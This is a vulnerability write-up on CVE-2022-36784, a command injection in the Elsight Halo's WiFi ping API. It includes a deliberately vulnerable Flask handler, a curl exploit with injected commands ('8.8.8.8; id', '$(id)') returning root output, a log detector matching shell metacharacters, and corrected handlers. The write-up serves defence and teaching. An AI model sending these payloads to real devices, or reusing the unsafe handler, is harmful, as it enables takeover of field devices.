CVE-2022-36784 - Remote Code Execution in Elsight Halo’s WiFi Ping API Endpoint

CVE-2022-36784 is a critical remote code execution (RCE) vulnerability affecting the Elsight Halo device—a popular product for secure data communication over cellular and WiFi networks (see Elsight’s official site for more on the product itself). If you manage networks or IoT deployments running these devices, or are interested in industrial cyber security, you’ll want to pay attention.

In this post, we’ll explain how a simple API feature in the Halo panel’s backend can let attackers run any command they want on the device, show you how the vulnerability works with code snippets, link you to the original advisories, and briefly discuss recommended fixes.

## The Vulnerability: Abusing the /ping API Call

Elsight Halo has a web panel for device administration. In that panel, you can check your WiFi connection by sending a POST request to this endpoint:

POST /api/v1/nics/wifi/wlan/ping

You send along a DESTINATION field that specifies what address (IP or hostname) to ping. Here’s where the problem lies.

The web backend code takes this user-supplied DESTINATION field and inserts it directly into an OS command, failing to sanitize the input. This is the classic “command injection” flaw.

Here’s a simplified Python version showing how the backend handler could look:

```python
import os
from flask import Flask, request

app = Flask(__name__)

@app.route("/api/v1/nics/wifi/wlan/ping", methods=["POST"])
def wifi_ping():
    data = request.get_json()
    destination = data.get("DESTINATION")
    # Unsafe: user input is interpolated straight into a shell command string!
    cmd = f"ping -c 4 {destination}"
    # os.popen() hands the string to /bin/sh, which honours ; | && $( ) and friends
    response = os.popen(cmd).read()
    return response
```

If you send a regular IP address, it runs the expected ping. If you send something malicious, you can trick it into running any command you like.

## Exploit Details: From Ping to RCE

Because the backend runs something like `ping -c 4 {DESTINATION}`, what happens if we set DESTINATION to this?

```
8.8.8.8; id
```

This will run:

```
ping -c 4 8.8.8.8; id
```

The semicolon (`;`) tells the shell to run a second command once the first one finishes. As a result, the output of `id` (which shows the user the process runs as) is returned in the response.

You could do much worse, like creating web shells, exfiltrating device data, or pivoting deeper into the network.

Here’s how you could exploit this using curl from a terminal:

```bash
curl -X POST \
  http://<ELSIGHT_DEVICE_IP>/api/v1/nics/wifi/wlan/ping \
  -H 'Content-Type: application/json' \
  -d '{"DESTINATION": "8.8.8.8; id"}'
```

Response (simplified):

```
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
...
uid=(root) gid=(root) groups=(root)
```

The last line (output from id) confirms code execution on the device as root.

## Real-World Impact

- Any authenticated user (with access to the web panel) can run OS commands; no special permission is needed.
- Possible consequences: data theft, device bricking, network pivoting, malware installation.
- This is especially dangerous in sensitive environments like critical infrastructure, fleets, or anywhere Halo is used for secure comms.
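Because the injected command travels in the JSON body of a legitimate API call, it is easy to spot if request bodies are logged. The following detector is an added example, not code from the post or from Elsight: it scans constructed JSON-lines request records (a hypothetical log format, not the Halo's real one) for POSTs to the ping endpoint whose DESTINATION contains shell metacharacters, or starts with a hyphen and so could be parsed as a ping option even when no shell is involved.

```python
import json
import re

# Endpoint named in the advisory; only POSTs to this path carry a DESTINATION field.
PING_PATH = "/api/v1/nics/wifi/wlan/ping"

# Characters that let a shell chain, substitute or redirect commands.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\r]")
# Characters a legitimate IPv4/IPv6 literal or hostname can contain.
BENIGN = re.compile(r"[A-Za-z0-9.\-:]+")


def classify_destination(value):
    """Return None when DESTINATION looks like a plain host, else a reason string."""
    if not isinstance(value, str) or not value:
        return "missing or non-string DESTINATION"
    if SHELL_META.search(value):
        return "shell metacharacter in DESTINATION"
    if value.startswith("-"):
        return "option-like DESTINATION (possible argument injection)"
    if not BENIGN.fullmatch(value):
        return "unexpected characters in DESTINATION"
    return None


def scan_log(lines):
    """Scan JSON-lines request records; return one finding per suspicious ping call."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # not a request record; ignore it
        if rec.get("method") != "POST" or rec.get("path") != PING_PATH:
            continue
        body = rec.get("body") or {}
        reason = classify_destination(body.get("DESTINATION"))
        if reason is not None:
            findings.append({
                "line": lineno,
                "src": rec.get("src"),
                "destination": body.get("DESTINATION"),
                "reason": reason,
            })
    return findings


# Constructed sample records (hypothetical format; the source addresses are made up).
SAMPLE_LOG = """
{"src": "10.0.0.5", "method": "POST", "path": "/api/v1/nics/wifi/wlan/ping", "body": {"DESTINATION": "8.8.8.8"}}
{"src": "10.0.0.9", "method": "POST", "path": "/api/v1/nics/wifi/wlan/ping", "body": {"DESTINATION": "8.8.8.8; id"}}
{"src": "10.0.0.5", "method": "GET", "path": "/api/v1/nics/wifi/wlan/status", "body": null}
{"src": "10.0.0.9", "method": "POST", "path": "/api/v1/nics/wifi/wlan/ping", "body": {"DESTINATION": "$(id)"}}
{"src": "10.0.0.7", "method": "POST", "path": "/api/v1/nics/wifi/wlan/ping", "body": {"DESTINATION": "gateway.example.com"}}
{"src": "10.0.0.9", "method": "POST", "path": "/api/v1/nics/wifi/wlan/ping", "body": {"DESTINATION": "-V"}}
""".strip().splitlines()

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['src']} -> {f['destination']!r}: {f['reason']}")
```

Run against the sample, the scanner flags lines 2, 4 and 6 and leaves the two ordinary pings and the unrelated GET alone. The same classifier can be dropped in front of the handler as a request filter, but it is a stopgap: the real fix is below, in how the command is executed.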

## References & Official Advisories

- Original CVE Entry: CVE-2022-36784
- SSD Labs Advisory: Elsight Halo RCE (SSD Advisory – SSD-2022-13008)

## How to Fix

Mitigating this vulnerability relies on input validation and, better, never invoking a shell with user-supplied content at all. Here is a corrected version of the handler, again in Python for illustration:

```python
import re
import subprocess
from flask import Flask, request

app = Flask(__name__)

# Allow only the characters an IP address or hostname can contain
SAFE_DESTINATION = re.compile(r'^[a-zA-Z0-9\.\-]+$')

@app.route("/api/v1/nics/wifi/wlan/ping", methods=["POST"])
def wifi_ping():
    data = request.get_json(silent=True) or {}
    destination = data.get("DESTINATION")
    # Validate input: reject a missing value and anything outside the allowlist
    if not isinstance(destination, str) or not SAFE_DESTINATION.match(destination):
        return "Invalid destination", 400
    # Pass an argument list (no shell=True): the destination is one argv entry
    # handed to execve, so the shell never gets a chance to parse it
    result = subprocess.run(["ping", "-c", "4", destination],
                            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return result.stdout.decode()
```
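The allowlist above stops shell injection, but it still accepts a value such as `-V`, which `ping` would read as an option rather than a host even though no shell is involved. The validator below is an added example, not Elsight's code or the advisory's: it accepts only an IPv4/IPv6 literal (via the standard `ipaddress` module) or an RFC 1123 hostname, refuses anything starting with a hyphen, and builds the argv list separately from running it so the validation can be tested without a network. `build_ping_argv` and `run_ping` are names chosen here, not part of any Halo API.

```python
import ipaddress
import re
import subprocess

# One RFC 1123 hostname label: letters, digits, hyphens; no leading or trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_destination(value):
    """True only for an IP literal or a well-formed hostname (not a shell or ping option)."""
    if not isinstance(value, str) or not value or len(value) > 253:
        return False
    if value.startswith("-"):
        return False  # would be parsed as a ping option, even with no shell involved
    try:
        ipaddress.ip_address(value)  # accepts IPv4 and IPv6 literals only
        return True
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def build_ping_argv(destination, count=4):
    """Return the argv list for ping, or raise ValueError on unsafe input.

    Each list element becomes exactly one argv entry passed to execve; nothing
    is ever concatenated into a command string, so ; | $( ) have no meaning.
    """
    if not is_valid_destination(destination):
        raise ValueError("invalid destination")
    return ["ping", "-c", str(int(count)), destination]


def run_ping(destination, count=4, timeout=15):
    """Run ping without a shell; returns (exit_code, combined output)."""
    argv = build_ping_argv(destination, count)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.returncode, proc.stdout + proc.stderr


if __name__ == "__main__":
    # Constructed inputs: two legitimate hosts and a few values that must be refused.
    for candidate in ["8.8.8.8", "gateway.example.com", "8.8.8.8; id", "$(id)", "-V"]:
        print(f"{candidate!r:24} valid={is_valid_destination(candidate)}")
```

A timeout on the subprocess is worth keeping as well: even a valid destination can make `ping` hang on an unreachable host, which turns the endpoint into an easy way to tie up the device's handler.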

## Conclusion

This vulnerability is a textbook example of why input handling matters, especially in IoT or remote access devices. CVE-2022-36784 in Elsight Halo is simple to exploit, but just as simple to avoid with good coding and updates.

Check your Halo panel, apply firmware updates, and never trust user input in system commands.

Got more questions about this bug or secure devices? Check the SSD Research blog for deep dives, and always consult your device vendor for current patches.

## Timeline

Published on: 11/17/2022 23:15:00 UTC
Last modified on: 11/22/2022 18:17:00 UTC